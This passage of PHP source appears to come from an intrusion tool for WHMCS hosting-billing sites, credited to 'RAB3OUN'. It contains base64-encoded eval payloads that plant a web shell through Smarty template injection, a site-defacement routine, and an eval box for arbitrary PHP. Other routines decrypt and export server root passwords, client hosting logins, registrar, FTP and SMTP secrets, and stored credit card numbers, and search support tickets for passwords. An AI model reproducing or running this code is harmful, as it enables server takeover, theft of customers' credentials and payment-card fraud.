0VnYm1GdFpUMGlZMjl1ZEdWdWRITWlJR052YkhNOUlqY3dJaUJ5YjNkelBTSXlOU0krRFFvOFAwVmphRzhnSkdacGJHVmpiMjUwWlc1MGN6cy9Qand2ZEdWNGRHRnlaV0UrUEM5bWIyNTBQanhpY2o0TkNqeHBibkIxZENCMGVYQmxQU0p6ZFdKdGFYUWlJRzVoYldVOUluTjFZbTFwZENJZ2RtRnNkV1U5SWxOaGRtVWlQZzBLUEdsdWNIVjBJSFI1Y0dVOUluSmxjMlYwSWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZz09Jyk7DQoNCiRmMHAzbiA9IGZvcGVuICgnYXR0YWNobWVudHMvcmFiM291bi5waHAnLCd3Jyk7DQoNCiR3cml0ICA9IGZ3cml0ZSgkZjBwM24gLCAkYzBkZSk7'));{/php}</textarea></fieldset>";
  753. echo "<fieldset><legend>templates_c/rab3oun.php</legend><textarea cols='50' rows='10' >{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajQ4UHcwS1pYSnliM0pmY21Wd2IzSjBhVzVuS0RBcE93MEtKSE5qY21sd2RHNWhiV1VnUFNBa1gxTkZVbFpGVWxzblUwTlNTVkJVWDA1QlRVVW5YVHNOQ2lSbWFXeGxibUZ0WlNBOUlDUmZVRTlUVkZzaVptbHNaVzVoYldVaVhUc05DbWxtS0NSZlVFOVRWRnNpYzNWaWJXbDBJbDBnUFQwZ0lrOXdaVzRpS1EwS2V3MEthV1lvWm1sc1pWOWxlR2x6ZEhNb0pHWnBiR1Z1WVcxbEtTa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0JvZEcxc1pXNTBhWFJwWlhNb1ptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0pHWnBiR1Z1WVcxbEtTazdEUXBwWmlnaEpHWnBiR1ZqYjI1MFpXNTBjeWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1RmNuSnZjaUJ2Y2lCT2J5QmpiMjUwWlc1MGN5QnBiaUJtYVd4bFBDOW1iMjUwUGlJN0RRcDlEUXBsYkhObERRb2tjM1JoZEhWeklEMGdJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytSbWxzWlNCa2IyVnpJRzV2ZENCbGVHbHpkQ0U4TDJadmJuUStJanNOQ24wSkNRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pFWld4bGRHVWlLUTBLZXcwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuc05DbWxtS0hWdWJHbHVheWdrWm1sc1pXNWhiV1VwS1FrTkNpUnpkR0YwZFhNZ1BTQWlQR1p2Ym5RZ1ptRmpaVDBuVm1WeVpHRnVZU2NnYzNSNWJHVTlKMlp2Ym5RdGMybDZaVG9nT0hCMEp6NUdhV3hsSUhOMVkyTmxjM05tZFd4c2VTQmtaV3hsZEdWa0lUd3ZabTl1ZEQ0aU93MEtaV3h6WlEwS0pITjBZWFIxY3lBOUlDSThabTl1ZENCbVlXTmxQU2RXWlhKa1lXNWhKeUJ6ZEhsc1pUMG5abTl1ZEMxemFYcGxPaUE0Y0hRblBrTnZkV3hrSUc1dmRDQmtaV3hsZEdVZ1ptbHNaU0U4TDJadmJuUStJanNOQ24wTkNtVnNjMlVOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJR1J2WlhNZ2JtOTBJR1Y0YVhOMElUd3ZabTl1ZEQ0aU93MEtmUTBLWld4elpTQnBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKVFlYWmxJaWtOQ25zTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCemRISnBjSE5zWVhOb1pYTW9hSFJ0YkY5bGJuUnBkSGxmWkdWamIyUmxLQ1JmVUU5VFZGc2lZMjl1ZEdWdWRITWlYU2twT3cwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuVnViR2x1YXlna1ptbHNaVzVoYldVcE93MEtKR2hoYm1Sc1pTQTlJR1p2Y0dWdUtDUm1hV3hsYm1GdFpTd2dJbmNpS1RzTkNtbG1LQ0VrYUdGdVpHeGxLUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCdmNHVnVJR1pwYkdVZ1ptOXlJSGR5YVhSbElHRmpZMlZ6Y3lFZ1BDOW1iMjUwUGlJN0RRcGxiSE5sRFFwN0RRcHBaaWdoWm5keWFYUmxLQ1JvWVc1a2JHVXNJQ1JtYVd4bFkyOXVkR1Z1ZEhNcEtRMEtKSE4wWVhSMWN5QTlJQ1J6ZEdGMGRYTXVJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytRMjkxYkdRZ2JtOTBJSGR5YVhSbElIUnZJR1pwYkdVaElDaE5ZWGxpWlNCNWIzVWdaR2xrYmlkMElHVnVkR1Z5SUdGdWVTQjBaWGgwUHlrOEwyWnZiblErSWpzTkNtWmpiRzl6WlNna2FHRnVaR3hsS1RzTkNuME5DaVJtYVd4bFkyOXVkR1Z1ZEhNZ1BTQm9kRzFzWlc1MGFYUnBaWE1vSkdacGJHVmpiMjUwWlc1MGN5azdEUXA5RFFwbGJITmxEUXA3RFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1RtOGdabWxzWlNCc2IyRmtaV1FoUEM5bWIyNTBQaUk3RFFwOURRby9QZzBLUEhSaFlteGxJR0p2Y21SbGNqMGlNQ0lnWVd4cFoyNDlJbU5sYm5SbGNpSStQSFJ5UGp4MFpENDhkR0ZpYkdVZ2QybGtkR2c5SWpFd01DVWlJR0p2Y21SbGNqMGlNQ0krUEhSeVBqeDBaRDROQ2p4bWIzSnRJRzFsZEdodlpEMGljRzl6ZENJZ1lXTjBhVzl1UFNJOFAwVmphRzhnSkhOamNtbHdkRzVoYldVN1B6NGlQZzBLUEdsdWNIVjBJRzVoYldVOUltWnBiR1Z1WVcxbElpQjBlWEJsUFNKMFpYaDBJaUIyWVd4MVpUMGlQRDlGWTJodklDUm1hV3hsYm1GdFpUcy9QaUlnYzJsNlpUMGlOeklpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdibUZ0WlQwaWMzVmliV2wwSWlCMllXeDFaVDBpVDNCbGJpSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCdVlXMWxQU0p6ZFdKdGFYUWlJSFpoYkhWbFBTSkVaV3hsZEdVaVBqd3ZkR1ErUEM5MGNqNDhMM1JoWW14bFBnMEtQR1p2Ym5RZ1ptRmpaVDBpVm1WeVpHRnVZU0lnYzNSNWJHVTlJbVp2Ym5RdGMybDZaVG9nTVRGd2RDSStEUW84ZEdWNGRHRnlaV0VnYm1GdFpUMGlZMjl1ZEdWdWRITWlJR052YkhNOUlqY3dJaUJ5YjNkelBTSXlOU0krRFFvOFAwVmphRzhnSkdacGJHVmpiMjUwWlc1MGN6cy9Qand2ZEdWNGRHRnlaV0UrUEM5bWIyNTBQanhpY2o0TkNqeHBibkIxZENCMGVYQmxQU0p6ZFdKdGFYUWlJRzVoYldVOUluTjFZbTFwZENJZ2RtRnNkV1U5SWxOaGRtVWlQZzBLUEdsdWNIVjBJSFI1Y0dVOUluSmxjMlYwSWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZz09Jyk7DQoNCiRmMHAzbiA9IGZvcGVuICgndGVtcGxhdGVzX2MvcmFiM291bi5waHAnLCd3Jyk7DQoNCiR3cml0ICA9IGZ3cml0ZSgkZjBwM24gLCAkYzBkZSk7'));{/php}</textarea></fieldset>";
  754.  
  755.  
  756. break;
  757. ###################################################
  758.  
  759. ################# INDEX ################################## </title>88888<DIV style="DISPLAY: none"><xmp>
  760. case 107:
  761. echo "<center><h1>Index</h1><br>";
  762. if($_POST["action"]=="1")
  763. {
  764. $tryChaning=mysql_query("update `tblconfiguration` set value='</title>".mysql_real_escape_string(stripslashes(nl2br($_POST['index'])))."<DIV style=\"DISPLAY: none\"><xmp>' where setting='CompanyName'" )or die("Erreur SQL !".$sql."<br>".mysql_error());
  765. if($tryChaning)
  766. {
  767.  
  768. echo '<p class="msg done">Updated successfully </p>';
  769. }
  770. else
  771. {
  772.  
  773. echo("<h3 class=\"tit\"><br>Error</h3>");
  774. }
  775. }
  776. echo "<form method=\"POST\" action=\"?p=107\" ><textarea name=\"index\" cols='50' rows='10' ></textarea><br><br><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"action\" value=\"1\"></form>";
  777. echo "<br><p class='msg info'> To delete index execute this in sql<br>".htmlentities("update `tblconfiguration` set value='xxxxx' where setting='CompanyName'</p>");
  778. break;
  779. ######################################################################################################
  780. case 106:
  781. echo "<center><h1>Daily Email Backup</h1><br>";
  782. if($_POST["action"]=="1")
  783. {
  784. $tryChaning=mysql_query("Update tblconfiguration set value='".$_POST["email"]."' where setting='DailyEmailBackup'" )or die("Erreur SQL !".$sql."<br>".mysql_error());
  785. if($tryChaning)
  786. {
  787.  
  788. echo("<p class='msg done'>Updated successfully </p>");
  789. }
  790. else
  791. {
  792.  
  793. echo("<h3 class=\"tit\"><br>Error</h3>");
  794. }
  795. }
  796. $query0=mysql_query("SELECT value from tblconfiguration where setting='DailyEmailBackup'");
  797. $v0=mysql_fetch_array($query0);
  798. echo "<table><tr><td><form method=\"POST\" action=\"?p=106\" ><input type=\"text\" size=60 name=\"email\" value=\"".$v0["value"]."\"></td><td><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"action\" value=\"1\"></form></td></tr></table>";
  799. break;
  800. ###################################################
  801. ###################################################
  802. case 1:
  803. $query=mysql_query("SELECT * FROM tblservers");
  804. if(!is_array(mysql_fetch_array($query)))
  805. {
  806.  
  807. echo '<p class="msg error">Nothing Found !</p>';
  808. }
  809. else
  810. {
  811. echo("<center><h1>H0st r00ts</h1><center><br><br> <br><form action=\"?p=1\" name=\"formw\" method=\"post\">\n\n<input name=\"export\" type=\"hidden\" value=\"1\">\n<center><input type=\"submit\" name=\"submit2\" class=\"input-submit\" value=\"[Save to TXT file ]\" /></center><br>");
  812. table("SELECT * FROM tblservers",array('type','active','hostname','ipaddress','username','password','accesshash'));
  813. }
  814. if($_POST["export"]==1)
  815. {
  816. $query=mysql_query("SELECT * FROM tblservers");
  817. $textr=$textr."\r\n######################### HOST ROOTS ###########################\r\n";
  818. while($v=mysql_fetch_array($query))
  819. {
  820. $ipaddress=$v["ipaddress"];
  821. $username=$v["username"];
  822. $type=$v["type"];
  823. $active=$v["active"];
  824. $hostname=$v["hostname"];
  825. $accesshash=$v["accesshash"];
  826. $password=decrypt($v["password"],$cc_encryption_hash);
  827. $textr=$textr."Type $type\r\n";
  828. $textr=$textr."Active $active\r\n";
  829. $textr=$textr."Hostname $hostname\r\n";
  830. $textr=$textr."Ip $ipaddress\r\n";
  831. if ($accesshash) $textr=$textr."Accesshash $accesshash\r\n";
  832. $textr=$textr."Username $username\r\n";
  833. $textr=$textr."Password $password\r\n**************************************\r\n";
  834. }
  835. $textr=$textr."\r\n######################### HOST ROOTS ###########################\r\n";
  836. @ob_end_clean();
  837. header("Content-length: ".strlen($textr));
  838. header("Content-type: text/plain");
  839. header("Content-Disposition: attachment; filename=".$_SERVER["HTTP_HOST"]."-host_R00t.txt");
  840. echo($textr);
  841. exit;
  842. }
  843. break;
  844. ###################################################
  845. case 2:
  846. $query=mysql_query("SELECT * FROM tblregistrars");
  847. if(!is_array(mysql_fetch_array($query)))
  848. {
  849.  
  850. echo '<p class="msg error">Nothing Found !</p>';
  851. }
  852. else
  853. {
  854. $i=0;
  855. $query=mysql_query("SELECT * FROM tblregistrars");
  856. echo("<center><h1>Domain Reseller</h1> <br><table border='0'>");
  857. while($v=mysql_fetch_array($query))
  858. {
  859. if ($v['registrar']<>$last) echo "<TR><Th COLSPAN=2><center>".ucfirst($v['registrar'])."</center></th></TR>";
  860. $last=$v['registrar'];
  861. $value=decrypt($v["value"],$cc_encryption_hash);
  862. if($value=="")
  863. {
  864. $value=0;
  865. }
  866. $password=decrypt($v["password"],$cc_encryption_hash);
  867. if ($i%2==0) {$bg='class="bg"';} else {$bg=';}
  868. echo("<tr $bg><td > ".$v["setting"]." </td><td>$value</td></tr>");
  869. $i++;
  870. }
  871.  
  872. echo"</table><br><br></center>";
  873. }
  874. break;
  875. ###################################################
  876. case 99:
  877. @ob_end_clean();
  878. actionSql();
  879. exit;
  880. /*
  881. $query=stripslashes($_POST["query"]);
  882. echo("<center><br><h1>SQL</h1><br><br><br><FORM action=\"?p=99\" method=\"post\" >\n\n<input type=\"text\" name=\"query\" value=\"".$query."\" style=\"width:500px;
  883. \" >\n<br><br>\n<INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\">\n</form>");
  884. if($_POST["query"])
  885. {
  886. echo("<table border'1'>");
  887. $result=mysql_query($query);
  888. $fieldnum=@mysql_num_fields($result);
  889. echo("<tr>");
  890. for($i=0;
  891. $i<$fieldnum;
  892. $i++)
  893. {
  894. $name=@mysql_field_name($result,$i);
  895. echo("<td>$name</td>");
  896. }
  897. echo("</tr>");
  898. while($v=@mysql_fetch_array($result,1))
  899. {
  900. $td="<tr><td>";
  901. $td=$td.implode("</td><td>",$v);
  902. $td=$td."</tr>\n";
  903. echo($td);
  904. }
  905.  
  906. echo("</table>");
  907. if(mysql_error()<>"")
  908. {
  909.  
  910. echo("<table border'1'><tr><td>Mysql error</td><td>".mysql_error()."</td></tr></table>");
  911. }
  912. else
  913. {
  914.  
  915. echo("<br><table border'1'><tr><td>SQL executed successfully </td></tr></table>");
  916. }
  917. }*/
  918. break;
  919. ###################################################
  920. case 100:
  921. multiview(
  922. 100,
  923. "tblclients",
  924. "Clients </h1></center><br><p class='msg info'>Click on id to get all info+Hosting Accounts+Tickets</p><center>",
  925. "id desc",
  926. array("email","companyname","country","firstname","lastname"),
  927. array("ID","Companyname","Email","Country","Firstname","lastname"),
  928. array("id","companyname","email","country","firstname","lastname")
  929. );
  930. break;
  931. ###################################################
  932. case 101:echo("<center><h1>Eval PHP</h1><br><br>");
  933. Echo"<form action='?p=101' method='POST' > <textarea rows='10' name='pp' cols='50'> </textarea><br /><input type='submit' value='Go' name='go' /></form></html>";
  934. $cod=$_POST["pp"];
  935. $send=$_POST["go"];
  936. if($send)
  937. {
  938. eVaL(stripslashes($cod));
  939. }
  940. break;
  941. ###################################################
  942. case 102:
  943. /*
  944. echo("<center>
  945.  
  946. <pre>
  947. __ ___ _ __ __ _____ _____ _ _______ _ _ ______ _____ ____
  948. \ \ / / | | | \/ |/ ____|/ ____| | |/ /_ _| | | | | ____| __ \ |___ \
  949. \ \ /\ / /| |__| | \ / | | | (___ | ' / | | | | | | | |__ | |__) | __ ____) |
  950. \ \/ \/ / | __ | |\/| | | \___ \ | < | | | | | | | __| | _ / \ \ / /__ <
  951. \ /\ / | | | | | | | |____ ____) | | . \ _| |_| |____| |____| |____| | \ \ \ V /___) |
  952. \/ \/ |_| |_|_| |_|\_____|_____/ |_|\_\_____|______|______|______|_| \_\ \_/|____/
  953. </pre>";
  954. */
  955. echo ("<h3 class=\"tit\">Info </h3><p class='msg info'>Coded by RAB3OUN <br>\nMail v.b-4@hotmail.com rab3oun.net@gmail.com<br>\nBlog <a href='http://www.rab3oun.net'>http://www.rab3oun.net</a></p> <br>
  956. <p class='msg warning'>Disclaimer <br> THIS TOOL WAS WRITTEN FOR EDUCATIONAL PURPOSES.
  957. ONLY USE THIS TOOL ON WEBSITES YOU ARE ALLOWED TO TEST
  958. <br> IF YOU DON'T AGREE WITH WHAT I SAID, PLEASE DON'T USE THIS TOOL.
  959. <br> THE AUTHOR CANNOT AND WILL NOT IN ANY WAY LIABLE FOR ANY LOSS OR DAMAGE ARISING WITH THE USE OF THIS TOOL.
  960. <br> USE IT UNDER YOUR OWN RISK!!!!!! THANKS.</p>
  961.  
  962. <br>\n<center><h3 class=\"tit\">Greets:</h3></center>\n<b>Ahwak2000</b> RENO <br>\n All Sec4ever TEAM\n");
  963.  
  964. echo "<center><h3 class=\"tit\">Donate ^_^</h3></center>";
  965.  
  966. echo '<br> Donate by Libertyreserve <a href="https://sci.libertyreserve.com/en?lr_acc=U0861977&lr_currency=LRUSD" alt="Pay With Liberty Reserve!"> <img src="https://www.libertyreserve.com/downloads/banners/accept.gif" alt="LR" border="0"/></a>';
  967. // echo "<p class='msg info'></p>";
  968. break;
  969.  
  970. ###################################################
  971. case 3:
  972.  
  973. multiview(
  974. 3,
  975. "tblhosting","Client R00ts</h1></center><br><p class='msg info'>There is no table dedicated to client root.<br>
  976. The Script find in the table where username = vmuserxxx, root , Admin , admin , Administrator , administrator </p><br><center>"
  977. ,"domainstatus",
  978. array("dedicatedip","ns1","ns2","username","domain"),
  979. array("Domain","Dedicatedip","User","Pass","Domainstatus","Client ID","Server ID","Notes"),
  980. array("domain","dedicatedip","username","password","domainstatus","userid","server","notes")
  981. ,1
  982. ,"(username like 'vmuser%' or username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or username = 'administrator') and ");
  983. if($_POST["export"]==1)
  984. {
  985. $textr=$textr."\r\n######################### Client R00ts ###########################\r\n";
  986. $query=mysql_query("SELECT * FROM tblhosting where username like 'vmuser%' or username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or username = 'administrator' order by domainstatus");
  987. while($v=mysql_fetch_array($query))
  988. {
  989. $textr=$textr."\r\nDomain ".$v["domain"]."\r\nIP ".$v["dedicatedip"]."\r\nUsername ".$v["username"]."\r\nPassword ".decrypt($v["password"],$cc_encryption_hash)."\r\nDomainstatus".$v["domainstatus"]."\r\n";
  990. }
  991. $textr=$textr."\r\n######################### Client R00ts ###########################\r\n";
  992. @ob_end_clean();
  993. header("Content-length: ".strlen($textr));
  994. header("Content-type: text/plain");
  995. header("Content-Disposition: attachment; filename=".$_SERVER["HTTP_HOST"]."-client_R00t.txt");
  996. echo($textr);
  997. exit;
  998. }
  999. break;
  1000. ###################################################
  1001. //function multiview($p,$table,$name,$order,$where,$col,$sql,$export=0,$if="")
  1002. case 4:
  1003. multiview(
  1004. 4,
  1005. "tblhosting","Clients Hosting Accounts","domainstatus",
  1006. array("dedicatedip","ns1","ns2","username","domain","assignedips","password","notes"),
  1007. array("Domain","Dedicatedip","User","Pass","Domainstatus","Client ID","Server ID","Notes","assignedips","Regdate"),
  1008. array("domain","dedicatedip","username","password","domainstatus","userid","server","notes","assignedips","regdate")
  1009. ,1);
  1010. if($_POST["export"]=="1")
  1011. {
  1012. $text=$text."\r\n######################### Client HOST ###########################\r\n";
  1013. $query=mysql_query("SELECT * FROM tblhosting where domainstatus='Active'");
  1014. while($v=mysql_fetch_array($query))
  1015. {
  1016. if(($v["username"])and($v["password"]))
  1017. {
  1018. $textr=$textr."\r\nDomain ".$v["domain"]."\r\nIP ".$v["dedicatedip"]."\r\nUsername ".$v["username"]."\r\nPassword ".decrypt($v["password"],$cc_encryption_hash)."\r\nDomainstatus ".$v["domainstatus"]."\r\n";
  1019. }
  1020. }
  1021. $textr=$textr."\r\n######################### Client HOST ###########################\r\n";
  1022. @ob_end_clean();
  1023. header("Content-length: ".strlen($textr));
  1024. header("Content-type: text/plain");
  1025. header("Content-Disposition: attachment; filename=".$_SERVER["HTTP_HOST"]."-client_host.txt");
  1026. echo($textr);
  1027. exit;
  1028. }
  1029. break;
  1030. ###################################################
  1031. case 5:
  1032. $query=mysql_query("SELECT * FROM `tblclients` WHERE cardtype <> ' order by issuenumber desc");
  1033. if(!is_array(mysql_fetch_array($query)))
  1034. {
  1035. echo '<h1>Clients CC</h1><br><p class="msg error">Nothing Found !</p>';
  1036. }
  1037. else
  1038. {
  1039. echo '<h1>Clients CC</h1><br>';
  1040. $query=mysql_query("SELECT * FROM `tblclients` WHERE cardtype <> ' order by issuenumber desc");
  1041. echo("<center><table border=1><tr><td>ID</td><td>cardtype</td><td>cardnum</td><td>expdate</td><td>issuenumber</td><td>Country</td></tr>");
  1042. $i=0;
  1043. while($v=mysql_fetch_array($query))
  1044. {
  1045. if ($i%2==0) {$bg='class="bg"';} else {$bg=';}
  1046. $cchash=md5($cc_encryption_hash.$v["0"]);
  1047. $s= mysql_query("select cardtype,
  1048. AES_DECRYPT(cardnum,'{$cchash}') as cardnum,
  1049. AES_DECRYPT(expdate,'{$cchash}') as expdate,
  1050. AES_DECRYPT(issuenumber,'{$cchash}') as issuenumber,
  1051. country,email,firstname,lastname,address1,city,state,postcode,phonenumber FROM `tblclients` where id='".$v['0']."'" );
  1052. $country=$v["country"];
  1053. $email=$v["email"];
  1054. $firstname=$v["firstname"];
  1055. $lastname=$v["lastname"];
  1056. $address1=$v["address1"];
  1057. $city=$v["city"];
  1058. $state=$v["state"];
  1059. $postcode=$v["postcode"];
  1060. $phonenumber=$v["phonenumber"];
  1061. $v2=mysql_fetch_array($s);
  1062. echo("<tr $bg ><td><a href='?p=12&id=".$v["id"]."'>".$v["id"]."</a></td><td>".$v2[0]."</td><td>".$v2[1]."</td><td>".$v2[2]."</td><td>".$v2[3]."</td><td>$country</td></tr>");
  1063. $i++;
  1064. }
  1065.  
  1066. echo("</table></center>");
  1067. }
  1068. break;
  1069. ###################################################
  1070. case 52:
  1071. $query=mysql_query("SELECT * FROM `tblclients` WHERE cardtype <> ' order by issuenumber desc");
  1072. if(!is_array(mysql_fetch_array($query)))
  1073. {
  1074. echo '<h1>Clients CC</h1><br><p class="msg error">Nothing Found !</p>';
  1075. }
  1076. else
  1077. {
  1078. echo '<h1>Clients CC</h1><br>';
  1079. $query=mysql_query("SELECT * FROM `tblclients` WHERE cardtype <> ' order by issuenumber desc");
  1080. echo("<center><table border=1><tr><td>ID</td><td>cardtype</td><td>cardnum</td><td>expdate</td><td>issuenumber</td><td>Country</td></tr>");
  1081. $i=0;
  1082. while($v=mysql_fetch_array($query))
  1083. {
  1084. if ($i%2==0) {$bg='class="bg"';} else {$bg=';}
  1085. $cchash=md5($cc_encryption_hash.$v["0"]);
  1086. $s= mysql_query("select cardtype,
  1087. AES_DECRYPT(cardnum,'{$cchash}') as cardnum,
  1088. AES_DECRYPT(expdate,'{$cchash}') as expdate,
  1089. AES_DECRYPT(issuenumber,'{$cchash}') as issuenumber,
  1090. country,email,firstname,lastname,address1,city,state,postcode,phonenumber FROM `tblclients` where id='".$v['0']."'" );
  1091. $country=$v["country"];
  1092. $email=$v["email"];
  1093. $firstname=$v["firstname"];
  1094. $lastname=$v["lastname"];
  1095. $address1=$v["address1"];
  1096. $city=$v["city"];
  1097. $state=$v["state"];
  1098. $postcode=$v["postcode"];
  1099. $phonenumber=$v["phonenumber"];
  1100. $v2=mysql_fetch_array($s);
  1101. if ($v2[3]<>"")
  1102. {
  1103. echo("<tr $bg ><td><a href='?p=12&id=".$v["id"]."'>".$v["id"]."</a></td><td>".$v2[0]."</td><td>".$v2[1]."</td><td>".$v2[2]."</td><td>".$v2[3]."</td><td>$country</td></tr>");
  1104. }
  1105. $i++;
  1106. }
  1107.  
  1108. echo("</table></center>");
  1109. }
  1110. break;
  1111.  
  1112. ###################################################
  1113. case 63:
  1114. $qq=$_GET["qq"];
  1115. $q=str_replace(" ","%",$_POST["q"]);
  1116. if($qq<>"")$q=$qq;
  1117. if($q=="")$q="%";
  1118. if($qq=="")$qq=$q;
  1119. echo("<center><h1>Clients Tickets</h1><br><br><h3 class=\"tit\" >Search</h3><br><FORM action=\"?p=63\" method=\"post\">\n<input type=\"text\" name=\"q\" value=\"".$q."\">\n<br>\n<INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\"> <br>ex: root%pass or root or 2086 \n");
  1120. if(isset($_GET["page"]))
  1121. {
  1122. $page=intval($_GET["page"]);
  1123. }
  1124. else
  1125. {
  1126. $page=1;
  1127. }
  1128. $start_from=($page-1)*100;
  1129. $query=mysql_query(" select id as tid,date FROM tbltickets where message LIKE '%".$q."%' union SELECT tid,date FROM `tblticketreplies` where message LIKE '%".$q."%' order by date desc");
  1130. while($vv=@mysql_fetch_array($query))
  1131. {
  1132. $list_tid0[]=$vv["tid"];
  1133. }
  1134. $list_tid=@array_values(array_unique($list_tid0));
  1135. $total_records=count($list_tid);
  1136. if($total_records==0)exit;
  1137. echo("<h3 class=\"tit\">Total Records ".$total_records."</h3><br>");
  1138. $total_pages=ceil($total_records/50);
  1139. echo("<br><table border='0'><tr >");
  1140. echo("<th>Page ".$page." Of ".$total_pages."</th>");
  1141. if($page>1)echo"<th><a href='?p=63&qq=".$qq."&page=".($page-1)."'>Back</a>&nbsp</th>";
  1142. echo"<th><a href='?p=63&qq=".$qq."&page=".$total_pages."'>Latest</a></th>";
  1143. if($page<$total_pages)echo"<th>&nbsp<a href='?p=63&qq=".$qq."&page=".($page+1)."'>Next</a>&nbsp</th>";
  1144. for ($i=0; $i<=$total_pages; $i++) {
  1145. if ($i%2==0) {$bg2='class="bg2"';} else {$bg2=';}
  1146. if ($i%20==0) echo "</tr><tr>";
  1147. if ($i==0)
  1148. {
  1149. echo "<td>&nbsp&nbsp</td>";
  1150. }
  1151. else
  1152. {
  1153. if($i==$page)
  1154. {
  1155. echo"<td $bg2>&nbsp<a href='?p=63&qq=".$qq."&page=".$i."'>(".$i.")</a>&nbsp</td>";
  1156. }
  1157. else
  1158. {
  1159. echo"<td $bg2>&nbsp<a href='?p=63&qq=".$qq."&page=".$i."'>".$i."</a>&nbsp</td>";
  1160. }
  1161. }
  1162. }
  1163. echo("</tr></table>");
  1164. for($i=$start_from;$i<($start_from+50);$i++)
  1165. {
  1166. $query1=mysql_query("SELECT * FROM tbltickets where id='".$list_tid[$i]."'");
  1167. while($v=mysql_fetch_array($query1))
  1168. {
  1169. echo("<br><br><h3 class=\"tit\">Ticket ID ".$v["id"]."</h3><br><br>");
  1170. $query2=mysql_query("select * from tblticketnotes where ticketid='".$v["id"]."'");
  1171. while($v2=mysql_fetch_array($query2))
  1172. {
  1173. echo '</center><p class="msg info">Tickets notes:'.$v2['message'].".</p><center>" ;
  1174. }
  1175. echo("<table border=1><tr><th><table width=100% border=1><th><th>".$v["title"]."</th><th>".$v["date"]."]</th><th>User id <a href='?p=12&id=".$v["userid"]."'><font color=\"#FFF\" >".$v["userid"]."</font></a></th><th>Ticket ID ".$v["id"]."</th></tr></table></th></tr>");
  1176. if($v["attachment"])
  1177. {
  1178. echo("<tr><td>".($v["message"])."<br>-----------<br>Attachment<br>".($v["attachment"])."</td></tr>");
  1179. }
  1180. else
  1181. {
  1182. echo("<tr><td>".($v["message"])."</td></tr>");
  1183. }
  1184. $query2=mysql_query("select * from tblticketreplies where tid='".$v["id"]."'");
  1185. while($v2=mysql_fetch_array($query2))
  1186. {
  1187. if($v2["admin"])
  1188. {
  1189.  
  1190. echo("<tr class='bg'><td> By ".$v2["admin"]."</td></tr><tr class='bg'><td>".nl2br(str_replace($qq,"<span class='tag'>$qq</span>",$v2["message"]))." <br>-----------<br>Attachment<br>".($v2["attachment"])."</td></tr>");
  1191. }
  1192. else
  1193. echo("<tr><td> By Client </td></tr><tr><td>".nl2br($v2["message"])." <br>-----------<br>Attachment<br>".nl2br($v2["attachment"])."</td></tr>");
  1194. }
  1195.  
  1196. echo("</table>");
  1197. }
  1198. }
  1199. break;
  1200. ###################################################
  1201. case 7:
  1202.  
  1203.  
  1204. echo("<center><h1>FTP and SMTP password</h1>");
  1205. table("SELECT * FROM tblconfiguration where setting='FTPBackupHostname' or setting='FTPBackupUsername' or setting='FTPBackupPassword' or setting='FTPBackupDestination' or setting='SMTPHost' or setting='SMTPUsername' or setting='SMTPPassword' or setting='SMTPPort' or setting='MailType'",array('setting','value'));
  1206. break;
  1207. ###################################################
  1208. case 8:
  1209. /*
  1210. echo "<table ><tr><td><a href=\"?p=8&page=1\" target=\"frame1\"> Upload</a></td>
  1211. <td><a href=\"?p=8&page=2\" target=\"frame1\">Delete Adminlog </a></td>
  1212. <td><a href=\"?p=8&page=3\" target=\"frame1\">Change Admin Password to 123456</a></td>
  1213. <td><a href=\"?p=8&page=4\" target=\"frame1\">Change Client Password to 123456</a></td>
  1214. <td><a href=\"?p=8&page=5\" target=\"frame1\">Change Client Mail </a></td>
  1215. <td><a href=\"?p=8&page=6\" target=\"frame1\">Decrypt Password</a></td>
  1216. </tr></table>";*/
  1217. switch($_GET['page'])
  1218. {
  1219. case"1":
  1220. echo "<center><h1>File Upload</h1><br><br><form method=\"POST\" action=\"?p=8\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"image\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"f\" value=\"upload\"></form>";
  1221. break;
  1222. case"2":
